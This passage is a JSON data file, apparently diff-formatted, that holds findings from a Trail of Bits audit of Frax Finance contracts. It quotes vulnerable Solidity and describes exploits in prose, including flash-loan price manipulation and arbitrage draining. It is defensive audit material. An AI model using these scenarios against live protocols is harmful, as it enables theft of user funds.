High", + "Difficulty: High" + ] + }, + { + "title": "6. spotPriceOHM is vulnerable to manipulation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The OHM_AMO contract uses the Uniswap V2 spot price to calculate the value of the collateral that it holds. This price can be manipulated by making a large trade through the OHM-FRAX pool. An attacker can manipulate the apparent value of collateral and thereby change the collateralization rate at will. FraxPoolV3 appears to contain the most funds at risk, but any contract that uses FRAX.globalCollateralValue is susceptible to a similar attack. (It looks like Pool_USDC has buybacks paused, so it should not be able to burn FXS, at the time of writing.) function spotPriceOHM () public view returns ( uint256 frax_per_ohm_raw , uint256 frax_per_ohm ) { ( uint256 reserve0 , uint256 reserve1 , ) = (UNI_OHM_FRAX_PAIR.getReserves()); // OHM = token0, FRAX = token1 frax_per_ohm_raw = reserve1.div(reserve0); frax_per_ohm = reserve1.mul(PRICE_PRECISION).div(reserve0.mul( 10 ** missing_decimals_ohm)); } Figure 6.1: old_contracts/Misc_AMOs/OHM_AMO.sol#L174-L180 FRAX.globalCollateralValue loops through frax_pools_array , including OHM_AMO , and aggregates collatDollarBalance . The collatDollarBalance for OHM_AMO is calculated using spotPriceOHM and thus is vulnerable to manipulation. function globalCollateralValue() public view returns ( uint256 ) { uint256 total_collateral_value_d18 = 0 ; for ( uint i = 0 ; i < frax_pools_array.length; i++){ // Exclude null addresses if (frax_pools_array[i] != address ( 0 )){ total_collateral_value_d18 = total_collateral_value_d18.add(FraxPool(frax_pools_array[i]).collatDollarBalance()); } } return total_collateral_value_d18; } Figure 6.2: contracts/Frax/Frax.sol#L180-L191 buyBackAvailableCollat returns the amount the protocol will buy back if the aggregate value of collateral appears to back each unit of FRAX with more than is required by the current collateral ratio. Since globalCollateralValue is manipulable, the protocol can be articially forced into buying (burning) FXS shares and paying out collateral. function buybackAvailableCollat () public view returns ( uint256 ) { uint256 total_supply = FRAX.totalSupply(); uint256 global_collateral_ratio = FRAX.global_collateral_ratio(); uint256 global_collat_value = FRAX.globalCollateralValue(); if (global_collateral_ratio > PRICE_PRECISION) global_collateral_ratio = PRICE_PRECISION; // Handles an overcollateralized contract with CR > 1 uint256 required_collat_dollar_value_d18 = (total_supply.mul(global_collateral_ratio)).div(PRICE_PRECISION); // Calculates collateral needed to back each 1 FRAX with $1 of collateral at current collat ratio if (global_collat_value > required_collat_dollar_value_d18) { // Get the theoretical buyback amount uint256 theoretical_bbk_amt = global_collat_value.sub(required_collat_dollar_value_d18); // See how much has collateral has been issued this hour uint256 current_hr_bbk = bbkHourlyCum[curEpochHr()]; // Account for the throttling return comboCalcBbkRct(current_hr_bbk, bbkMaxColE18OutPerHour, theoretical_bbk_amt); } else return 0 ; } Figure 6.3: contracts/Frax/Pools/FraxPoolV3.sol#L284-L303 buyBackFXS calculates the amount of FXS to burn from the user, calls b urn on the FRAXShares contract, and sends the caller an equivalent dollar amount in USDC. function buyBackFxs ( uint256 col_idx , uint256 fxs_amount , uint256 col_out_min ) external collateralEnabled(col_idx) returns ( uint256 col_out ) { require (buyBackPaused[col_idx] == false , \"Buyback is paused\" ); uint256 fxs_price = getFXSPrice(); uint256 available_excess_collat_dv = buybackAvailableCollat(); // If the total collateral value is higher than the amount required at the current collateral ratio then buy back up to the possible FXS with the desired collateral require (available_excess_collat_dv > 0 , \"Insuf Collat Avail For BBK\" ); // Make sure not to take more than is available uint256 fxs_dollar_value_d18 = fxs_amount.mul(fxs_price).div(PRICE_PRECISION); require (fxs_dollar_value_d18 <= available_excess_collat_dv, \"Insuf Collat Avail For BBK\" ); // Get the equivalent amount of collateral based on the market value of FXS provided uint256 collateral_equivalent_d18 = fxs_dollar_value_d18.mul(PRICE_PRECISION).div(collateral_prices[col_idx]); col_out = collateral_equivalent_d18.div( 10 ** missing_decimals[col_idx]); // In its natural decimals() // Subtract the buyback fee col_out = (col_out.mul(PRICE_PRECISION.sub(buyback_fee[col_idx]))).div(PRICE_PRECISION); // Check for slippage require (col_out >= col_out_min, \"Collateral slippage\" ); // Take in and burn the FXS, then send out the collateral FXS.pool_burn_from( msg.sender , fxs_amount); TransferHelper.safeTransfer(collateral_addresses[col_idx], msg.sender , col_out); // Increment the outbound collateral, in E18, for that hour // Used for buyback throttling bbkHourlyCum[curEpochHr()] += collateral_equivalent_d18; } Figure 6.4: contracts/Frax/Pools/FraxPoolV3.sol#L488-L517 recollateralize takes collateral from a user and gives the user an equivalent amount of FXS, including a bonus. Currently, the bonus_rate is set to 0 , but a nonzero bonus_rate would signicantly increase the protability of an attack. // When the protocol is recollateralizing, we need to give a discount of FXS to hit the new CR target // Thus, if the target collateral ratio is higher than the actual value of collateral, minters get FXS for adding collateral // This function simply rewards anyone that sends collateral to a pool with the same amount of FXS + the bonus rate // Anyone can call this function to recollateralize the protocol and take the extra FXS value from the bonus rate as an arb opportunity function recollateralize( uint256 col_idx, uint256 collateral_amount, uint256 fxs_out_min) external collateralEnabled(col_idx) returns ( uint256 fxs_out) { require (recollateralizePaused[col_idx] == false , \"Recollat is paused\" ); uint256 collateral_amount_d18 = collateral_amount * ( 10 ** missing_decimals[col_idx]); uint256 fxs_price = getFXSPrice(); // Get the amount of FXS actually available (accounts for throttling) uint256 fxs_actually_available = recollatAvailableFxs(); // Calculated the attempted amount of FXS fxs_out = collateral_amount_d18.mul(PRICE_PRECISION.add(bonus_rate).sub(recollat_fee[col_idx]) ).div(fxs_price); // Make sure there is FXS available require (fxs_out <= fxs_actually_available, \"Insuf FXS Avail For RCT\" ); // Check slippage require (fxs_out >= fxs_out_min, \"FXS slippage\" ); // Don't take in more collateral than the pool ceiling for this token allows require (freeCollatBalance(col_idx).add(collateral_amount) <= pool_ceilings[col_idx], \"Pool ceiling\" ); // Take in the collateral and pay out the FXS TransferHelper.safeTransferFrom(collateral_addresses[col_idx], msg.sender , address ( this ), collateral_amount); FXS.pool_mint( msg.sender , fxs_out); // Increment the outbound FXS, in E18 // Used for recollat throttling rctHourlyCum[curEpochHr()] += fxs_out ; } Figure 6.5: contracts/Frax/Pools/FraxPoolV3.sol#L519-L550 Exploit Scenario FraxPoolV3.bonus_rate is nonzero. Using a ash loan, an attacker buys OHM with FRAX, drastically increasing the spot price of OHM. When FraxPoolV3.buyBackFXS is called, the protocol incorrectly determines that FRAX has gained additional collateral. This causes the pool to burn FXS shares and to send the attacker USDC of the equivalent dollar value. The attacker moves the price in the opposite direction and calls recollateralize on the pool, receiving and selling newly minted FXS, including a bonus, for prot. This attack can be carried out until the buyback and recollateralize hourly cap, currently 200,000 units, is reached. Recommendations Short term, take one of the following steps to mitigate this issue: Call FRAX.removePool and remove OHM_AMO . Note, this may cause the protocol to become less collateralized. Call FraxPoolV3.setBbkRctPerHour and set bbkMaxColE18OutPerHour and rctMaxFxsOutPerHour to 0 . Calling toggleMRBR to pause USDC buybacks and recollateralizations would have the same eect. The implications of this mitigation on the long-term sustainability of the protocol are not clear. Long term, do not use the spot price to determine collateral value. Instead, use a time-weighted average price (TWAP) or an oracle such as Chainlink. If a TWAP is used, ensure that the underlying pool is highly liquid and not easily manipulated. Additionally, create a rigorous process to onboard collateral since an exploit of this nature could destabilize the system. References samczsun, \"So you want to use a price oracle\" euler-xyz/uni-v3-twap-manipulation", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "7. Return values of the Chainlink oracle are not validated ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The latestRoundData function returns a signed integer that is coerced to an unsigned integer without checking that the value is a positive integer. An overow (e.g., uint(-1) ) would drastically misrepresent the price and cause unexpected behavior. In addition, FraxPoolV3 does not validate the completion and recency of the round data, permitting stale price data that does not reect recent changes. function getFRAXPrice() public view returns ( uint256 ) { ( , int price, , , ) = priceFeedFRAXUSD.latestRoundData(); return uint256 (price).mul(PRICE_PRECISION).div( 10 ** chainlink_frax_usd_decimals); } function getFXSPrice() public view returns ( uint256 ) { ( , int price, , , ) = priceFeedFXSUSD.latestRoundData(); return uint256 (price).mul(PRICE_PRECISION).div( 10 ** chainlink_fxs_usd_decimals); } Figure 7.1: contracts/Frax/Pools/FraxPoolV3.sol#231239 An older version of Chainlinks oracle interface has a similar function, latestAnswer . When this function is used, the return value should be checked to ensure that it is a positive integer. However, round information does not need to be checked because latestAnswer returns only price data. Recommendations Short term, add a check to latestRoundData and similar functions to verify that values are non-negative before converting them to unsigned integers, and add an invariant that checks that the round has nished and that the price data is from the current round: require(updatedAt != 0 && answeredInRound == roundID) . Long term, dene a minimum update threshold and add the following check: require((block.timestamp - updatedAt <= minThreshold) && (answeredInRound == roundID)) . Furthermore, use consistent interfaces instead of mixing dierent versions. References Chainlink AggregatorV3Interface", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "8. Unlimited arbitrage in CCFrax1to1AMM ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The CCFrax1to1AMM contract implements an automated market maker (AMM) with a constant price and zero slippage. It is a constant sum AMM that maintains the invariant = + , where the token balances. must remain constant during swaps (ignoring fees) and and are Constant sum AMMs are impractical because they are vulnerable to unlimited arbitrage. If the price dierence of the AMMs tokens in external markets is large enough, the most protable arbitrage strategy is to buy the total reserve of the more expensive token from the AMM, leaving the AMM entirely imbalanced. Other AMMs like Uniswap and Curve prevent unlimited arbitrage by making the price depend on the reserves. This limits prots from arbitrage to a fraction of the total reserves, as the price will eventually reach a point at which the arbitrage opportunity disappears. No such limit exists in the CCFrax1to1AMM contract. While arbitrage opportunities are somewhat limited by the token caps, fees, and gas prices, unlimited arbitrage is always possible once the reserves or the dierence between the FRAX price and the token price becomes large enough. While token_price swings are limited by the price_tolerance parameter, frax_price swings are not limited. Exploit Scenario The CCFrax1to1AMM contract is deployed, and price_tolerance is set to 0.05. A token is whitelisted with a token_cap of 100,000 and a swap_fee of 0.0004. A user transfers 100,000 FRAX to an AMM. The price of minimum at which the AMM allows swaps, and the price of FRAX in an external market becomes 1.005. Alice buys (or takes out a ash loan of) $100,000 worth of market. Alice swaps all of her external market, making a prot of $960. No FRAX remains in the AMM. in the external for FRAX with the AMM and then sells all of her FRAX in the in an external market becomes 0.995, the This scenario is conservative, as it assumes a balance of only 100,000 FRAX and a frax_price of 1.005. As frax_price and the balance increase, the arbitrage prot increases. Recommendations Short term, do not deploy CCFrax1to1AMM and do not fund any existing deployments with signicant amounts. Those funds will be at risk of being drained through arbitrage. Long term, when providing stablecoin-to-stablecoin liquidity, use a Curve pool or another proven and audited implementation of the stableswap invariant.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "9. Collateral prices are assumed to always be $1 ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "In the FraxPoolV3 contract, the setCollateralPrice function sets collateral prices and stores them in the collateral_prices mapping. As of December 13, 2021, collateral prices are set to $1 for all collateral types in the deployed version of the FraxPoolV3 contract. Currently, only stablecoins are used as collateral within the Frax Protocol. For those stablecoins, $1 is an appropriate price approximation, at most times. However, when the actual price of the collateral diers enough from $1, users could choose to drain value from the protocol through arbitrage. Conversely, during such price uctuations, other users who are not aware that FraxPoolV3 assumes collateral prices are always $1 can receive less value than expected. Collateral tokens that are not pegged to a specic value, like ETH or WBTC, cannot currently be used safely within FraxPoolV3 . Their prices are too volatile, and repeatedly calling setCollateralPrice is not a feasible solution to keeping their prices up to date. Exploit Scenario The price of FEI, one of the stablecoins collateralizing the Frax Protocol, changes to $0.99. Alice, a user, can still mint FRAX/FXS as if the price of FEI were $1. Ignoring fees, Alice can buy 1 million FEI for $990,000, mint 1 million FRAX/FXS with the 1 million FEI, and sell the 1 million FRAX/FXS for $1 million, making $10,000 in the process. As a result, the Frax Protocol loses $10,000. If the price of FEI changes to $1.01, Bob would expect that he can exchange his 1 million FEI for 1.01 million FRAX/FXS. Since FraxPoolV3 is not aware of the actual price of FEI, Bob receives only 1 million FRAX/FXS, incurring a 1% loss. Recommendations Short term, document the arbitrage opportunities described above. Warn users that they could lose funds if collateral prices dier from $1. Disable the option to set collateral prices to values not equal to $1. Long term, modify the FraxPoolV3 contract so that it fetches collateral prices from a price oracle.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "10. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "Frax Finance has enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past . A high-severity bug in the emscripten -generated solc -js compiler used by True and Remix persisted until late 2018. The x for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations causes a security vulnerability in the Frax Finance contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "11. Users are unable to limit the amount of collateral paid to FraxPoolV3 ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The amount of collateral and FXS that is paid by the user in mintFrax is dynamically computed from the collateral ratio and price. These parameters can change between transaction creation and transaction execution. Users currently have no way to ensure that the paid amounts are still within acceptable limits at the time of transaction execution. Exploit Scenario Alice wants to call mintFrax . In the time between when the transaction is broadcast and executed, the global collateral ratio, collateral, and/or FXS prices change in such a way that Alice's minting operation is no longer protable for her. The minting operation is still executed, and Alice loses funds. Recommendations Short term, add the maxCollateralIn and maxFXSIn parameters to mintFrax , enabling users to make the transaction revert if the amount of collateral and FXS that they would have to pay is above acceptable limits. Long term, always add such limits to give users the ability to prevent unacceptably large input amounts and unacceptably small output amounts when those amounts are dynamically computed.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "12. Incorrect default price tolerance in CCFrax1to1AMM ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The price_tolerance state variable of the CCFrax1to1AMM contract is set to 50,000, which, when using the xed point scaling factor inconsistent with the variables inline comment, which indicates the number 5,000, corresponding to 0.005. A price tolerance of 0.05 is probably too high and can lead to unacceptable arbitrage activities; this suggests that price_tolerance should be set to the value indicated in the code comment. 6 1 0 , corresponds to 0.05. This is uint256 public price_tolerance = 50000 ; // E6. 5000 = .995 to 1.005 Figure 12.1: The price_tolerance state variable ( CCFrax1to1AMM.sol#56 ) Exploit Scenario This issue exacerbates the exploit scenario presented in issue TOB-FRSOL-008 . Given that scenario, but with a price tolerance of 50,000, Alice is able to gain $5459 through arbitrage. A higher price tolerance leads to higher arbitrage prots. Recommendations Short term, set the price tolerance to 5,000 both in the code and on the deployed contract. Long term, ensure that comments are in sync with the code and that constants are correct.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "13. Signicant code duplication ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "Signicant code duplication exists throughout the codebase. Duplicate code can lead to incomplete xes or inconsistent behavior (e.g., because the code is modied in one location but not in all). For example, the FraxUnifiedFarmTemplate.sol and StakingRewardsMultiGauge.sol les both contain a retroCatchUp function. As seen in gure 13.1, the functions are almost identical. // If the period expired, renew it function retroCatchUp () internal { // Pull in rewards from the // If the period expired, renew it function retroCatchUp () internal { // Pull in rewards from the rewards distributor rewards distributor rewards_distributor. distributeReward ( addr ess ( this )); rewards_distributor. distributeReward ( addr ess ( this )); // Ensure the provided reward // Ensure the provided reward amount is not more than the balance in the contract. amount is not more than the balance in the contract. // This keeps the reward rate in // This keeps the reward rate in the right range, preventing overflows due to the right range, preventing overflows due to // very high values of rewardRate // very high values of rewardRate in the earned and rewardsPerToken functions; in the earned and rewardsPerToken functions; // Reward + leftover must be less // Reward + leftover must be less than 2^256 / 10^18 to avoid overflow. than 2^256 / 10^18 to avoid overflow. uint256 num_periods_elapsed = uint256 num_periods_elapsed = uint256 ( block .timestamp - periodFinish) / rewardsDuration; // Floor division to the nearest period uint256 ( block .timestamp. sub (periodFinish) ) / rewardsDuration; // Floor division to the nearest period // Make sure there are enough // Make sure there are enough tokens to renew the reward period tokens to renew the reward period for ( uint256 i = 0 ; i < for ( uint256 i = 0 ; i < rewardTokens.length; i++){ rewardTokens.length; i++){ require (( rewardRates (i) * rewardsDuration * (num_periods_elapsed + 1 )) <= ERC20 (rewardTokens[i]). balanceOf ( address ( this )), string ( abi . encodePacked ( \"Not enough reward tokens available: \" , rewardTokens[i])) ); require ( rewardRates (i). mul (rewardsDuratio n). mul (num_periods_elapsed + 1 ) <= ERC20 (rewardTokens[i]). balanceOf ( address ( this )), string ( abi . encodePacked ( \"Not enough reward tokens available: \" , rewardTokens[i])) ); } } // uint256 old_lastUpdateTime = // uint256 old_lastUpdateTime = lastUpdateTime; lastUpdateTime; // uint256 new_lastUpdateTime = // uint256 new_lastUpdateTime = block.timestamp; block.timestamp; // lastUpdateTime = periodFinish; periodFinish = periodFinish + // lastUpdateTime = periodFinish; periodFinish = ((num_periods_elapsed + 1 ) * rewardsDuration); periodFinish. add ((num_periods_elapsed. add ( 1 )). mul (rewardsDuration)); // Update the rewards and time _updateStoredRewardsAndTime (); _updateStoredRewardsAndTime (); emit // Update the fraxPerLPStored fraxPerLPStored = RewardsPeriodRenewed ( address (stakingToken )); fraxPerLPToken (); } } Figure 13.1: Left: contracts/Staking/FraxUnifiedFarmTemplate.sol#L463-L490 Right: contracts/Staking/StakingRewardsMultiGauge.sol#L637-L662 Exploit Scenario Alice, a Frax Finance developer, is asked to x a bug in the retroCatchUp function. Alice updates one instance of the function, but not both. Eve discovers a copy of the function in which the bug is not xed and exploits the bug. Recommendations Short term, perform a comprehensive code review and identify pieces of code that are semantically similar. Factor out those pieces of code into separate functions where it makes sense to do so. This will reduce the risk that those pieces of code diverge after the code is updated. Long term, adopt code practices that discourage code duplication. Doing so will help to prevent this problem from recurring.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "14. StakingRewardsMultiGauge.recoverERC20 allows token managers to steal rewards ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The recoverERC20 function in the StakingRewardsMultiGauge contract allows token managers to steal rewards. This violates conventions established by other Frax Solidity contracts in which recoverERC20 can be called only by the contract owner. The relevant code appears in gure 14.1. The recoverERC20 function checks whether the caller is a token manager and, if so, sends him the requested amount of the token he manages. Convention states that this function should be callable only by the contract owner. Moreover, its purpose is typically to recover tokens unrelated to the contract. // Added to support recovering LP Rewards and other mistaken tokens from other systems to be distributed to holders function recoverERC20 ( address tokenAddress , uint256 tokenAmount ) external onlyTknMgrs ( tokenAddress ) { // Check if the desired token is a reward token bool isRewardToken = false ; for ( uint256 i = 0 ; i < rewardTokens.length; i++){ if (rewardTokens[i] == tokenAddress) { isRewardToken = true ; break ; } } // Only the reward managers can take back their reward tokens if (isRewardToken && rewardManagers[tokenAddress] == msg.sender ){ ERC20 (tokenAddress). transfer ( msg.sender , tokenAmount); emit Recovered ( msg.sender , tokenAddress, tokenAmount); return ; } Figure 14.1: contracts/Staking/StakingRewardsMultiGauge.sol#L798-L814 For comparison, consider the CCFrax1to1AMM contracts recoverERC20 function. It is callable only by the contract owner and specically disallows transferring tokens used by the contract. function recoverERC20 ( address tokenAddress , uint256 tokenAmount ) external onlyByOwner { require (!is_swap_token[tokenAddress], \"Cannot withdraw swap tokens\" ); TransferHelper. safeTransfer ( address (tokenAddress), msg.sender , tokenAmount); } Figure 14.2: contracts/Misc_AMOs/__CROSSCHAIN/Moonriver/CCFrax1to1AMM.sol#L340-L344 Exploit Scenario Eve tricks Frax Finance into making her a token manager for the StakingRewardsMultiGauge contract. When the contracts token balance is high, Eve withdraws the tokens and vanishes. Recommendations Short term, eliminate the token managers ability to call recoverERC20 . This will bring recoverERC20 in line with established conventions regarding the functions purpose and usage. Long term, regularly review all uses of contract modiers, such as onlyTknMgrs . Doing so will help to expose bugs like the one described here.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "15. Convex_AMO_V2 custodian can withdraw rewards ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The Convex_AMO_V2 custodian can withdraw rewards. This violates conventions established by other Frax Solidity contracts in which the custodian is only able to pause operations. The relevant code appears in gure 15.1. The withdrawRewards function is callable by the contract owner, governance, or the custodian. This provides signicantly more power to the custodian than other contracts in the Frax Solidity repository. function withdrawRewards ( uint256 crv_amt , uint256 cvx_amt , uint256 cvxCRV_amt , uint256 fxs_amt ) external onlyByOwnGovCust { if (crv_amt > 0 ) TransferHelper. safeTransfer (crv_address, msg.sender , crv_amt); if (cvx_amt > 0 ) TransferHelper. safeTransfer ( address (cvx), msg.sender , cvx_amt); if (cvxCRV_amt > 0 ) TransferHelper. safeTransfer (cvx_crv_address, msg.sender , cvxCRV_amt); if (fxs_amt > 0 ) TransferHelper. safeTransfer (fxs_address, msg.sender , fxs_amt); } Figure 15.1: contracts/Misc_AMOs/Convex_AMO_V2.sol#L425-L435 Exploit Scenario Eve tricks Frax Finance into making her the custodian for the Convex_AMO_V2 contract. When the unclaimed rewards are high, Eve withdraws them and vanishes. Recommendations Short term, determine whether the Convex_AMO_V2 custodian requires the ability to withdraw rewards. If so, document this as a security concern. This will help users to understand the risks associated with depositing funds into the Convex_AMO_V2 contract. Long term, implement a mechanism that allows rewards to be distributed without requiring the intervention of an intermediary. Reducing human involvement will increase users overall condence in the system.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "16. The FXS1559 documentation is inaccurate ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The FXS1559 documentation states that excess FRAX tokens are exchanged for FXS tokens, and the FXS tokens are then burned. However, the reality is that those FXS tokens are redistributed to veFXS holders. More specically, the documentation states the following: Specically, every time interval t, FXS1559 calculates the excess value above the CR [collateral ration] and mints FRAX in proportion to the collateral ratio against the value. It then uses the newly minted currency to purchase FXS on FRAX-FXS AMM pairs and burn it. However, in the FXS1559_AMO_V3 contract, the number of FXS tokens that are burned is a tunable parameter (see gures 16.1 and 16.2). The parameter defaults to, and is currently, 0 (according to Etherscan). burn_fraction = 0 ; // Give all to veFXS initially Figure 16.1: contracts/Misc_AMOs/FXS1559_AMO_V3.sol#L87 // Calculate the amount to burn vs give to the yield distributor uint256 amt_to_burn = fxs_received. mul (burn_fraction). div (PRICE_PRECISION); uint256 amt_to_yield_distributor = fxs_received. sub (amt_to_burn); // Burn some of the FXS burnFXS (amt_to_burn); // Give the rest to the yield distributor FXS. approve ( address (yieldDistributor), amt_to_yield_distributor); yieldDistributor. notifyRewardAmount (amt_to_yield_distributor); Figure 16.2: contracts/Misc_AMOs/FXS1559_AMO_V3.sol#L159-L168 Exploit Scenario Frax Finance is publicly shamed for claiming that FXS is deationary when it is not. Condence in FRAX declines, and it loses its peg as a result. Recommendations Short term, correct the documentation to indicate that some proportion of FXS tokens may be distributed to veFXS holders. This will help users to form correct expectations regarding the operation of the protocol. Long term, consider whether FXS tokens need to be redistributed. The documentation makes a compelling argument for burning FXS tokens. Adjusting the code to match the documentation might be a better way of resolving this discrepancy.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "17. Univ3LiquidityAMO defaults the price of collateral to $1 ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The Uniswap V3 AMOs default to a price of $1 unless an oracle is set, and it is not clear whether an oracle is or will be set. If the contract lacks an oracle, the contract will return the number of collateral units instead of the price of collateral, meaning that it will value each unit of collateral at $1 instead of the correct price. While this may not be an issue for stablecoins, this pattern is error-prone and unclear. It could introduce errors in the global collateral value of FRAX since the protocol may underestimate (or overestimate) the value of the collateral if the price is above (or below) $1. col_bal_e188 is the balance, not the price, of the tokens. When collatDolarValue is called without an oracle, the contract falls back to valuing each token at $1. function freeColDolVal() public view returns ( uint256 ) { uint256 value_tally_e18 = 0 ; for ( uint i = 0 ; i < collateral_addresses.length; i++){ ERC20 thisCollateral = ERC20(collateral_addresses[i]); uint256 missing_decs = uint256 ( 18 ).sub(thisCollateral.decimals()); uint256 col_bal_e18 = thisCollateral.balanceOf( address ( this )).mul( 10 ** missing_decs); uint256 col_usd_value_e18 = collatDolarValue(oracles[collateral_addresses[i]], col_bal_e18); value_tally_e18 = value_tally_e18.add(col_usd_value_e18); } return value_tally_e18; } Figure 17.1: contracts/Misc_AMOs/UniV3LiquidityAMO_V2.sol#L161-L171 function collatDolarValue (OracleLike oracle, uint256 balance ) public view returns ( uint256 ) { if ( address (oracle) == address ( 0 )) return balance; return balance.mul(oracle.read()).div( 1 ether); } Figure 17.2: contracts/Misc_AMOs/UniV3LiquidityAMO_V2.sol#L174-L177 Exploit Scenario The value of a collateral token is $0.50. Instead of incentivizing recollateralization, the protocol indicates that it is adequately collateralized (or overcollateralized). However, the price of the collateral token is half the $1 default value, and the protocol needs to respond to the insucient collateral backing FRAX. Recommendations Short term, integrate the Uniswap V3 AMOs properly with an oracle, and remove the hard-coded price assumptions. Long term, review and test the eect of each pricing function on the global collateral value and ensure that the protocol responds correctly to changes in collateralization.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "18. calc_withdraw_one_coin is vulnerable to manipulation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The showAllocations function determines the amount of collateral in dollars that a contract holds. calc_withdraw_one_coin is a Curve AMM function based on the current state of the pool and changes as trades are made through the pool. This spot price can be manipulated using a ash loan or large trade similar to the one described in TOB-FRSOL-006 . function showAllocations () public view returns (uint256[ 10 ] memory return_arr) { // ------------LP Balance------------ // Free LP uint256 lp_owned = (mim3crv_metapool.balanceOf(address(this))); // Staked in the vault uint256 lp_value_in_vault = MIM3CRVInVault(); lp_owned = lp_owned.add(lp_value_in_vault); // ------------3pool Withdrawable------------ uint256 mim3crv_supply = mim3crv_metapool.totalSupply(); uint256 mim_withdrawable = 0 ; uint256 _3pool_withdrawable = 0 ; if (lp_owned > 0 ) _3pool_withdrawable = mim3crv_metapool.calc_withdraw_one_coin(lp_owned, 1 ); // 1: 3pool index Figure 18.1: contracts/Misc_AMOs/MIM_Convex_AMO.sol#L145-160 Exploit Scenario MIM_Convex_AMO is included in FRAX.globalCollateralValue , and the FraxPoolV3.bonus_rate is nonzero. An attacker manipulates the return value of calc_withdraw_one_coin , causing the protocol to undervalue the collateral and reach a less-than-desired collateralization ratio. The attacker then calls FraxPoolV3.recollateralize , adds collateral, and sells the newly minted FXS tokens, including a bonus, for prot. Recommendations Short term, do not use the Curve AMM spot price to value collateral. Long term, use an oracle or get_virtual_price to reduce the likelihood of manipulation. References Medium, \"Economic Attack on Harvest FinanceDeep Dive\"", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "19. Incorrect valuation of LP tokens ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The Frax Protocol uses liquidity pool (LP) tokens as collateral and includes their value in the global collateralization value. In addition to the protocols incorrect inclusion of FRAX as collateral (see TOB-FRSOL-024 ), the calculation of the value pool tokens representing Uniswap V2-like and Uniswap V3 positions is inaccurate. As a result, the global collateralization value could be incorrect. getAmount0ForLiquidity ( getAmount1ForLiquidity) returns the amount, not the value, of token0 (token1) in that price range; the price of FRAX should not be assumed to be $1, for the same reasons outlined in TOB-FRSOL-017 . The userStakedFrax helper function uses the metadata of each Uniswap V3 NFT to calculate the collateral value of the underlying tokens. Rather than using the current range, the function calls getAmount0ForLiquidty using the range set by a liquidity provider. This suggests that the current price of the assets is within the range set by the liquidity provider, which is not necessarily the case. If the market price is outside the given range, the underlying position will contain 100% of one token rather than a portion of both tokens. Thus, the underlying tokens will not be at a 50% allocation at all times, so this assumption is false. The actual redemption value of the NFT is not the same as what was deposited since the underlying token amounts and prices change with market conditions. In short, the current calculation does not update correctly as the price of assets change, and the global collateral value will be wrong. function userStakedFrax (address account ) public view returns (uint256) { uint256 frax_tally = 0 ; LockedNFT memory thisNFT; for (uint256 i = 0 ; i < lockedNFTs[account].length; i++) { thisNFT = lockedNFTs[account][i]; uint256 this_liq = thisNFT.liquidity; if (this_liq > 0 ){ uint160 sqrtRatioAX96 = TickMath.getSqrtRatioAtTick(thisNFT.tick_lower); uint160 sqrtRatioBX96 = TickMath.getSqrtRatioAtTick(thisNFT.tick_upper); if (frax_is_token0){ frax_tally = frax_tally.add(LiquidityAmounts.getAmount0ForLiquidity(sqrtRatioAX96, sqrtRatioBX96, uint128(thisNFT.liquidity))); } else { frax_tally = frax_tally.add(LiquidityAmounts.getAmount1ForLiquidity(sqrtRatioAX96, sqrtRatioBX96, uint128(thisNFT.liquidity))); } } } // In order to avoid excessive gas calculations and the input tokens ratios. 50% FRAX is assumed // If this were Uni V2, it would be akin to reserve0 & reserve1 math // There may be a 